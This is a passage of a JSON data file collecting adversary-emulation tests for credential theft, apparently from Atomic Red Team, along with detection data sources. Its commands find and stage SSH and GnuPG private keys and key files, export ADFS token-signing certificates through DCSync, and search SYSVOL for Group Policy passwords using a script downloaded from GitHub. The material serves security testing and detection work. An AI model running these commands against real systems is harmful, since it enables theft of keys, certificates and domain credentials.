$Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n", + "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n", + "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n", + "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;" + ], + "commands": [ + { + "command": "dir c:\\ /b /s .key | findstr /e .key\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "find / -name id_rsa >> #{output_file}\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team 
Test - Unsecured Credentials: Private Keys" + }, + { + "command": "find #{search_path} -name id_rsa >> /tmp/keyfile_locations.txt\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec cp --parents {} /tmp/art-staging \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/art-staging\nfind #{search_path} -name id_rsa -exec rsync -R {} /tmp/art-staging \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir #{output_folder}\nfind / -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "mkdir /tmp/GnuPG\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} /tmp/GnuPG \\;\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" 
+ }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": 
"atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ 
-like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt 
them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() 
\n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "source": "atomics/T1552.004/T1552.004.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Private Keys" + }, + { + "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + }, + { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;", + "source": "data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml", + "name": "Find private keys on the file system" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.004", + "display_name": "Unsecured Credentials: Private Keys", + "atomic_tests": [ + { + "name": "Private Keys", + "auto_generated_guid": "520ce462-7ca7-441e-b5a5-f8347f632696", + "description": "Find private keys on the Windows file 
system.\nFile extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dir c:\\ /b /s .key | findstr /e .key\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Discover Private SSH Keys", + "auto_generated_guid": "46959285-906d-40fa-9437-5a439accd878", + "description": "Discover private SSH keys on a macOS or Linux system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_file": { + "description": "Output file containing locations of SSH key files", + "type": "Path", + "default": "/tmp/keyfile_locations.txt" + } + }, + "executor": { + "command": "find #{search_path} -name id_rsa >> #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Copy Private SSH Keys with CP", + "auto_generated_guid": "7c247dc7-5128-4643-907b-73a76d9135c3", + "description": "Copy private SSH keys on a Linux system to a staging folder using the `cp` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "Path", + "default": "/tmp/art-staging" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \\;\n", + "cleanup_command": "rm #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "Copy Private SSH Keys with rsync", + "auto_generated_guid": "864bb0b2-6bb5-489a-b43b-a77b3a16d68a", + "description": "Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "macos", + 
"linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "Path", + "default": "/tmp/art-staging" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "Copy the users GnuPG directory with rsync", + "auto_generated_guid": "2a5a0601-f5fb-4e2e-aa09-73282ae6afca", + "description": "Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from", + "type": "Path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing a copy of the .gnupg directory", + "type": "Path", + "default": "/tmp/GnuPG" + } + }, + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, + { + "name": "ADFS token signing and encryption certificates theft - Local", + "auto_generated_guid": "78e95057-d429-4e66-8f82-0f060c1ac96f", + "description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). 
You must be signed in as Administrator on an ADFS server.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals module must be installed.\n", + "prereq_command": "if (Get-Module AADInternals) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "ADFS token signing and encryption certificates theft - Remote", + "auto_generated_guid": "cab413d8-9e4a-4b8d-9b84-c985bd73a442", + "description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfs_service_account_name": { + "description": "Name of the ADFS service account", + "type": "String", + "default": "adfs_svc" + }, + "replication_user": { + "description": "Username with replication rights. 
It can be the Domain Admin running the script", + "type": "String", + "default": "Administrator" + }, + "replication_password": { + "description": "Password of replication_username", + "type": "String", + "default": "ReallyStrongPassword" + }, + "adfs_server_name": { + "description": "Name of an ADFS server", + "type": "String", + "default": "sts.contoso.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AADInternals and ActiveDirectory modules must be installed.\n", + "prereq_command": "if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}\n", + "get_prereq_command": "Install-Module -Name AADInternals -Force\n" + } + ], + "executor": { + "command": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = 
[System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", + "cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + }, + { + "id": "de632c2d-a729-4b77-b781-6a6b09c148ba", + "name": "Find private keys", + "description": "Find private keys on the file system", + "tactic": "credential-access", + "technique": { + "attack_id": "T1552.004", + "name": "Unsecured Credentials: Private Keys" + }, + "platforms": { + "windows": { + "psh": { + "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n" + }, + "cmd": { + "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n" + } + }, + "darwin": { + "sh": { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n" + } + }, + "linux": { + "sh": { + "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b 
.asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.006", + "command_list": [ + "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + ". PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1\nGet-GPPPassword -Verbose\n" + ], + "commands": [ + { + "command": "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + }, + { + "command": ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + }, + { + "command": ". PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1\nGet-GPPPassword -Verbose\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.006", + "display_name": "Unsecured Credentials: Group Policy Preferences", + "atomic_tests": [ + { + "name": "GPP Passwords (findstr)", + "auto_generated_guid": "870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt on Kali Linux.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + "name": "command_prompt" + } + }, + { + "name": "GPP Passwords (Get-GPPPassword)", + "auto_generated_guid": "e9584f82-322c-474a-b831-940fd8b4455c", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.\nThis test is intended to be run from a domain joined workstation, not on the Domain Controller itself.\nThe Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.\n\nSuccessful test execution will either display the credentials found in the GPP files or indicate \"No preference files found\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gpp_script_url": { + "description": "URL of the Get-GPPPassword PowerShell Script", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1" + }, + "gpp_script_path": { + "description": "Path to the Get-GPPPassword PowerShell Script", + "type": "Path", + "default": "PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}\n", + "prereq_command": "if(Test-Path \"#{gpp_script_path}\") {exit 0 } else {exit 1 }\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{gpp_script_path}\") -Force | 
Out-Null\nInvoke-WebRequest #{gpp_script_url} -OutFile \"#{gpp_script_path}\"\n" + }, + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + 